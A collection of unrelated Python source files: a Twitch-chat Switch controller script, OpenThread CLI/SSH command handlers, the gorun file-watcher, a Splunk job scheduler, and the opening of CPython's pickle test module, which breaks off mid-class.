controller.hold_buttons(BUTTON_ZR)
sleep(1.0)
controller.hold_buttons(BUTTON_ZR)
command_executed = True
elif single == "SHOOT_ARROW":
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
sleep(1.0)
controller.hold_buttons(BUTTON_ZR)
command_executed = True
elif single == "NEXT_WEAPON":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "NEXT_ARROW":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "NEXT_SHIELD":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "NEXT_RUNE":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_WEAPON":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_WEAPON":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_ARROW":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_ARROW":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_SHIELD":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_SHIELD":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_RUNE":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_RUNE":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "ATTACK":
increment_button_count("Y")
controller.push_button(BUTTON_Y)
sleep(0.2)
command_executed = True
elif single == "BASH":
increment_button_count("Y")
controller.push_button(BUTTON_Y)
sleep(0.5)
command_executed = True
elif single == "CLIMB":
increment_button_count("X")
controller.push_button(BUTTON_X)
command_executed = True
elif single == "FOCUS":
increment_button_count("ZL")
controller.push_button(BUTTON_ZL)
command_executed = True
elif single == "SHEIKAH_SLATE":
increment_button_count("SELECT")
controller.push_button(BUTTON_MINUS)
sleep(0.5)
command_executed = True
elif single == "MENU":
increment_button_count("START")
controller.push_button(BUTTON_PLUS)
sleep(0.5)
command_executed = True
elif single == "STRAFE_LEFT":
controller.move_left()
controller.hold_buttons(BUTTON_ZL)
sleep(1.5)
controller.release_buttons(BUTTON_ZL)
controller.release_left_stick()
command_executed = True
elif single == "STRAFE_RIGHT":
controller.move_right()
controller.hold_buttons(BUTTON_ZL)
sleep(1.5)
controller.release_buttons(BUTTON_ZL)
controller.release_left_stick()
command_executed = True
elif single == "FOCUS":
controller.push_button(BUTTON_ZL)
command_executed = True
elif single in ["RUN", "RUN_FORWARD", "RUN_UP", "RUN_BACKWARD", "RUN_BACK", "RUN_DOWN", "RUN_LEFT", "RUN_RIGHT"]:
if single in ["RUN", "RUN_FORWARD"]:
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single in ["RUN_BACKWARD", "RUN_BACK"]:
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_UP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_DOWN":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_LEFT":
increment_button_count("LX MIN")
controller.move_left()
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
command_executed = True
elif single in ["ONWARD"]:
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
command_executed = True
elif single in ["STOP", "STILL"]:
controller.release_left_stick()
command_executed = True
elif single == "PULL_OUT":
increment_button_count("A")
controller.hold_buttons(BUTTON_A)
command_executed = True
elif single == "MOVEMENTWAIT":
controller.reset().wait()
command_executed = True
elif single == "CONNECT": #connect the controller to the console
controller.connect()
command_executed = True
# Experimental
elif single == "DASH_ATTACK":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(0.05)
increment_button_count("Y")
controller.push_button(BUTTON_Y)
sleep(0.15)
controller.release_left_stick()
controller.release_buttons(BUTTON_B)
command_executed = True
elif single == "GLIDE":
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.release_left_stick()
command_executed = True
# Custom commands
elif single[0:7] == "CUSTOM(" and single.find(")") > 7: # single == "CUSTOM(smthg)"
tmpr = single[7:single.find(")")].strip().replace("_", " ") # tmpr == "smthg"
combine = []
if tmpr[0:1] == "[" and tmpr.find("]") > 0: # tmpr == "a[b, ...]c"
combine = tmpr[tmpr.find("[") + 1:tmpr.find("]")].split(";") # combine == ["b", "..."]
tmpr = tmpr[tmpr.find("]") + 1:] # tmpr == "c"
elif tmpr.find(";") > -1: # tmpr == "x,y"
combine = [tmpr[0:tmpr.find(";")]] # combine == ["x"]
else: # tmpr = "x"
combine = [tmpr] # combine == ["x"]
tmpr = ""
tmpr = tmpr[tmpr.find(";") + 1:].strip()
# At this point...
# combine is an array of commands
# tmpr is a string supposedly containing the duration of the custom command
duration = 0.02
try:
duration = float(tmpr)
if duration > 0 and duration <= 1: # the duration has to be between 0 and 1 second
duration = duration
else:
duration = 0.02
except:
0
cmd = [] # array of the commands to execute, again...
for i in combine:
i = i.strip().replace(" ", "_")
if i in ["PLUS", "START"]:
increment_button_count("START")
cmd.append(BUTTON_PLUS)
elif i in ["MINUS", "SELECT"]:
increment_button_count("SELECT")
cmd.append(BUTTON_MINUS)
elif i == "A":
increment_button_count("A")
cmd.append(BUTTON_A)
elif i == "B":
increment_button_count("B")
cmd.append(BUTTON_B)
elif i == "X":
increment_button_count("X")
cmd.append(BUTTON_X)
elif i == "Y":
increment_button_count("Y")
cmd.append(BUTTON_Y)
elif i in ["UP", "DUP", "D_UP"]:
increment_button_count("UP")
cmd.append(DPAD_UP)
elif i in ["DOWN", "DDOWN", "D_DOWN"]:
increment_button_count("DOWN")
cmd.append(DPAD_DOWN)
elif i in ["LEFT", "DLEFT", "D_LEFT"]:
increment_button_count("LEFT")
cmd.append(DPAD_LEFT)
elif i in ["RIGHT", "DRIGHT", "D_RIGHT"]:
increment_button_count("RIGHT")
cmd.append(DPAD_RIGHT)
elif i in ["L", "LB"]:
increment_button_count("L")
cmd.append(BUTTON_L)
elif i in ["R", "RB"]:
increment_button_count("R")
cmd.append(BUTTON_R)
elif i in ["ZL", "LT"]:
increment_button_count("ZL")
cmd.append(BUTTON_ZL)
elif i in ["ZR", "RT"]:
increment_button_count("ZR")
cmd.append(BUTTON_ZR)
elif i in ["LCLICK", "L3"]:
increment_button_count("LCLICK")
cmd.append(BUTTON_LCLICK)
elif i in ["RCLICK", "R3"]:
increment_button_count("RCLICK")
cmd.append(BUTTON_RCLICK)
elif i in ["LUP", "L_UP"]:
increment_button_count("LY MIN")
cmd.append("L_UP")
elif i in ["LDOWN", "L_DOWN"]:
increment_button_count("LY MAX")
cmd.append("L_DOWN")
elif i in ["LLEFT", "L_LEFT"]:
increment_button_count("LX MIN")
cmd.append("L_LEFT")
elif i in ["LRIGHT", "L_RIGHT"]:
increment_button_count("LX MAX")
cmd.append("L_RIGHT")
elif i in ["RUP", "R_UP"]:
increment_button_count("RY MIN")
cmd.append("R_UP")
elif i in ["RDOWN", "R_DOWN"]:
increment_button_count("RY MAX")
cmd.append("R_DOWN")
elif i in ["RLEFT", "R_LEFT"]:
increment_button_count("RX MIN")
cmd.append("R_LEFT")
elif i in ["RRIGHT", "R_RIGHT"]:
increment_button_count("RX MAX")
cmd.append("R_RIGHT")
elif i == "WAIT":
cmd.append("WAIT")
for i in cmd: # buttons to hold
if i in [BUTTON_PLUS, BUTTON_MINUS, BUTTON_A, BUTTON_B, BUTTON_X, BUTTON_Y, BUTTON_L, BUTTON_R,
BUTTON_ZL, BUTTON_ZR, BUTTON_LCLICK, BUTTON_RCLICK]:
controller.hold_buttons(i)
command_executed = True
elif i in [DPAD_UP, DPAD_DOWN, DPAD_LEFT, DPAD_RIGHT]:
controller.hold_dpad(i)
command_executed = True
elif i == "L_UP":
controller.move_forward(GAME_MODE)
command_executed = True
elif i == "L_DOWN":
controller.move_backward(GAME_MODE)
command_executed = True
elif i == "L_LEFT":
controller.move_left()
command_executed = True
elif i == "L_RIGHT":
controller.move_right()
command_executed = True
elif i == "R_UP":
controller.look_up()
command_executed = True
elif i == "R_DOWN":
controller.look_down()
command_executed = True
elif i == "R_LEFT":
controller.look_left()
command_executed = True
elif i == "R_RIGHT":
controller.look_right()
command_executed = True
elif i == "WAIT":
command_executed = True
if command_executed: # sleep if any command has been executed
sleep(duration)
for i in cmd: # release the buttons
if i in [BUTTON_PLUS, BUTTON_MINUS, BUTTON_A, BUTTON_B, BUTTON_X, BUTTON_Y, BUTTON_L, BUTTON_R,
BUTTON_ZL, BUTTON_ZR, BUTTON_LCLICK, BUTTON_RCLICK]:
controller.release_buttons(i)
elif i in [DPAD_UP, DPAD_DOWN, DPAD_LEFT, DPAD_RIGHT]:
controller.release_dpad()
elif i in ["L_UP", "L_DOWN", "L_LEFT", "L_RIGHT"]:
controller.release_left_stick()
elif i in ["R_UP", "R_DOWN", "R_LEFT", "R_RIGHT"]:
controller.release_right_stick()
if command_executed:
global LAST_COMMAND
LAST_COMMAND = timestamp()
class TwitchIRC(asyncore.dispatcher):
username = None
password = None
channel = None
authenticated = False
def __init__(self, username: str, password: str, channel: str) -> None:
assert username is not None, "No username specified!"
assert password is not None, "No password specified!"
assert channel is not None, "No channel specified!"
self.username = username
self.password = password
self.channel = channel
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect((TWITCH_HOST, TWITCH_PORT))
self.buffer = bytes("PASS %s\r\nNICK %s\r\n" % (password, username), "utf8")
prevent_timeout()
def handle_connect(self):
pass
def handle_close(self):
self.close()
def handle_read(self):
data = self.recv(2048).decode("utf8", errors="ignore").rstrip()
if "Welcome, GLHF!" in data and not self.authenticated:
self.authenticated = True
self.buffer += bytes("JOIN #%s\r\n" % (self.channel), "utf8")
elif data == "PING :tmi.twitch.tv":
print("PING!")
self.buffer += b"PONG :tmi.twitch.tv\r\n"
print("PONG!")
elif "%s.tmi.twitch.tv" % (self.channel) not in data or self.username in data: #chat messages here
global CURRENT_THREAD
matches = CHAT_EXP.match(data)
print(data)
if matches:
(username, command, channel, message) = matches.groups()
print(username + " --> " + message)
if CURRENT_THREAD is None or not CURRENT_THREAD.is_alive():
CURRENT_THREAD = Thread(target=execute_command, args=[message])
CURRENT_THREAD.start()
def readable(self):
return True
def writable(self):
return (len(self.buffer) > 0)
def handle_write(self):
sent = self.send(self.buffer)
self.buffer = self.buffer[sent:]
if __name__ == "__main__":
#load or create config
if isfile(CONFIG_FILE):
cfg = load(open(CONFIG_FILE, "r"))
else:
cfg = {"username": "", "password": ""}
dump(cfg, open(CONFIG_FILE, "w"))
print("Sample config created!")
raise Exception("Please edit the configuration file to reflect your Twitch API settings")
#check if database exists
if not isfile(DATABASE_FILE):
create_database()
print("Database created!")
with Controller() as controller:
try:
print("https://www.twitch.tv/" + cfg["username"])
irc = TwitchIRC(cfg["username"], cfg["password"], cfg["username"])
except KeyboardInterrupt:
controller.reset().wait()
exit(0)
asyncore.loop()
|
command_handlers.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {
'scan',
}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> None:
self.__otcli.writeline(cmd)
if cmd in {'reset', 'factoryreset'}:
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.isSet():
line = self.__otcli.readline()
if line.startswith('> '):
line = line[2:]
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password):
import paramiko
self.__host = host
self.__port = port
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'sudo ot-ctl "{cmd}"'
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(sh_cmd, timeout=int(timeout), bufsize=1024)
err = cmd_err.read().decode('utf-8')
if err:
raise CommandError(cmd, [err])
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
|
gorun.py
|
#!/usr/bin/env python
#
# Wrapper on pyinotify for running commands
# (c) 2009 Peter Bengtsson, peter@fry-it.com
#
# TODO: Ok, now it does not start a command while another is runnnig
# But! then what if you actually wanted to test a modification you
# saved while running another test
# Yes, we could stop the running command and replace it by the new test
# But! django tests will complain that a test db is already here
import argparse
import os
from subprocess import Popen
from threading import Lock, Thread
__version__='1.6'
class SettingsClass(object):
VERBOSE = False
settings = SettingsClass()
try:
from pyinotify import WatchManager, Notifier, ThreadedNotifier, ProcessEvent, EventsCodes
except ImportError:
print "pyinotify not installed. Try: easy_install pyinotify"
raise
def _find_command(path):
# path is a file
assert os.path.isfile(path)
# in dictionary lookup have keys as files and directories.
# if this path exists in there, it's a simple match
try:
return lookup[path]
except KeyError:
pass
# is the parent directory in there?
while path != '/':
path = os.path.dirname(path)
try:
return lookup[path]
except KeyError:
pass
def _ignore_file(path):
if path.endswith('.pyc'):
return True
if path.endswith('~'):
return True
basename = os.path.basename(path)
if basename.startswith('.#'):
return True
if basename.startswith('#') and basename.endswith('#'):
return True
if '.' in os.path.basename(path) and \
basename.split('.')[-1] in settings.IGNORE_EXTENSIONS:
return True
if os.path.split(os.path.dirname(path))[-1] in settings.IGNORE_DIRECTORIES:
return True
if not os.path.isfile(path):
return True
class PTmp(ProcessEvent):
def __init__(self):
super(PTmp, self).__init__()
self.lock = Lock()
def process_IN_CREATE(self, event):
if os.path.basename(event.pathname).startswith('.#'):
# backup file
return
print "Creating:", event.pathname
command = _find_command(event.pathname)
#def process_IN_DELETE(self, event):
# print "Removing:", event.pathname
# command = _find_command(event.pathname)
def process_IN_MODIFY(self, event):
if _ignore_file(event.pathname):
return
def execute_command(event, lock):
# By default trying to acquire a lock is blocking
# In this case it will create a queue of commands to run
#
# If you try to acquire the lock in the locked state non-blocking
# style, it will immediatly returns False and you know that a
# command is already running, and in this case we don't want to run
# this command at all.
block = settings.RUN_ON_EVERY_EVENT
if not lock.acquire(block):
# in this case we just want to not execute the command
return
print "Modifying:", event.pathname
command = _find_command(event.pathname)
if command:
if settings.VERBOSE:
print "Command: ",
print command
p = Popen(command, shell=True)
sts = os.waitpid(p.pid, 0)
lock.release()
command_thread = Thread(target=execute_command, args=[event, self.lock])
command_thread.start()
def start(actual_directories):
wm = WatchManager()
flags = EventsCodes.ALL_FLAGS
mask = flags['IN_MODIFY'] #| flags['IN_CREATE']
p = PTmp()
notifier = Notifier(wm, p)
for actual_directory in actual_directories:
print "DIRECTORY", actual_directory
wdd = wm.add_watch(actual_directory, mask, rec=True)
# notifier = Notifier(wm, p, timeout=10)
try:
print "Waiting for stuff to happen..."
notifier.loop()
except KeyboardInterrupt:
pass
return 0
lookup = {}
def configure_more(directories):
actual_directories = set()
#print "directories", directories
# Tune the configured directories a bit
for i, (path, cmd) in enumerate(directories):
if isinstance(path, (list, tuple)):
actual_directories.update(configure_more(
[(x, cmd) for x in path]))
continue
if not path.startswith('/'):
path = os.path.join(os.path.abspath(os.path.dirname('.')), path)
if not (os.path.isfile(path) or os.path.isdir(path)):
raise OSError, "%s neither a file or a directory" % path
path = os.path.normpath(path)
if os.path.isdir(path):
if path.endswith('/'):
# tidy things up
path = path[:-1]
if path == '.':
path = ''
actual_directories.add(path)
else:
# because we can't tell pyinotify to monitor files,
# when a file is configured, add it's directory
actual_directories.add(os.path.dirname(path))
lookup[path] = cmd
return actual_directories
def get_settings_file():
"""Return a setting file path or exit if not passed in and no
defaults settings files are found.
"""
parser = argparse.ArgumentParser(description="Gorun")
path_files = [os.path.expanduser('~/.gorun_settings.py'),
os.path.expanduser('~/.gorunsettings.py')]
parser.add_argument('-c', '--conf', help='Full path to the configuration file')
ns = parser.parse_args()
settings_file = None
if ns.conf:
settings_file = ns.conf
else:
for path in path_files:
if os.path.isfile(path):
settings_file = path
print("Using configuration file %s" % settings_file)
break
if settings_file is None:
parser.print_help()
sys.exit(1)
return settings_file
if __name__ == '__main__':
import sys
import imp
settings_file = get_settings_file()
sys.path.append(os.path.abspath(os.curdir))
x = imp.load_source('gorun_settings', settings_file)
settings.DIRECTORIES = x.DIRECTORIES
settings.VERBOSE = getattr(x, 'VERBOSE', settings.VERBOSE)
settings.IGNORE_EXTENSIONS = getattr(x, 'IGNORE_EXTENSIONS', tuple())
settings.IGNORE_DIRECTORIES = getattr(x, 'IGNORE_DIRECTORIES', tuple())
settings.RUN_ON_EVERY_EVENT = getattr(x, 'RUN_ON_EVERY_EVENT', False)
actual_directories = configure_more(settings.DIRECTORIES)
sys.exit(start(actual_directories))
|
scheduler.py
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import queue
import random
import threading
from time import time
from splunktalib.common import log
class Scheduler:
"""
A simple scheduler which schedules the periodic or once event
"""
import sortedcontainers as sc
max_delay_time = 60
def __init__(self):
self._jobs = Scheduler.sc.SortedSet()
self._wakeup_q = queue.Queue()
self._lock = threading.Lock()
self._thr = threading.Thread(target=self._do_jobs)
self._thr.deamon = True
self._started = False
def start(self):
"""
Start the schduler which will start the internal thread for scheduling
jobs. Please do tear_down when doing cleanup
"""
if self._started:
log.logger.info("Scheduler already started.")
return
self._started = True
self._thr.start()
def tear_down(self):
"""
Stop the schduler which will stop the internal thread for scheduling
jobs.
"""
if not self._started:
log.logger.info("Scheduler already tear down.")
return
self._wakeup_q.put(True)
def _do_jobs(self):
while 1:
(sleep_time, jobs) = self.get_ready_jobs()
self._do_execution(jobs)
try:
done = self._wakeup_q.get(timeout=sleep_time)
except queue.Empty:
pass
else:
if done:
break
self._started = False
log.logger.info("Scheduler exited.")
def get_ready_jobs(self):
"""
@return: a 2 element tuple. The first element is the next ready
duration. The second element is ready jobs list
"""
now = time()
ready_jobs = []
sleep_time = 1
with self._lock:
job_set = self._jobs
total_jobs = len(job_set)
for job in job_set:
if job.get_expiration() <= now:
ready_jobs.append(job)
if ready_jobs:
del job_set[: len(ready_jobs)]
for job in ready_jobs:
if job.get_interval() != 0 and not job.stopped():
# repeated job, calculate next due time and enqueue
job.update_expiration()
job_set.add(job)
if job_set:
sleep_time = job_set[0].get_expiration() - now
if sleep_time < 0:
log.logger.warn("Scheduler satuation, sleep_time=%s", sleep_time)
sleep_time = 0.1
if ready_jobs:
log.logger.info(
"Get %d ready jobs, next duration is %f, "
"and there are %s jobs scheduling",
len(ready_jobs),
sleep_time,
total_jobs,
)
ready_jobs.sort(key=lambda job: job.get("priority", 0), reverse=True)
return (sleep_time, ready_jobs)
def add_jobs(self, jobs):
with self._lock:
now = time()
job_set = self._jobs
for job in jobs:
delay_time = random.randrange(0, self.max_delay_time)
job.set_initial_due_time(now + delay_time)
job_set.add(job)
self._wakeup()
def update_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
job_set.discard(njob)
job_set.add(njob)
self._wakeup()
def remove_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
njob.stop()
job_set.discard(njob)
self._wakeup()
def number_of_jobs(self):
with self._lock:
return len(self._jobs)
def disable_randomization(self):
self.max_delay_time = 1
def _wakeup(self):
self._wakeup_q.put(None)
def _do_execution(self, jobs):
for job in jobs:
job()
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import os_helper
from test.support import (
TestFailed, run_with_locale, no_tracing,
_2G, _4G, bigmemtest
)
from test.support.import_helper import forget
from test.support.os_helper import TESTFN
from test.support import threading_helper
from test.support.warnings_helper import save_restore_warnings_filters
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
def identity(x):
return x
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
# Simple mutable object.
class Object:
pass
# Hashable immutable key object containing unheshable mutable data.
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
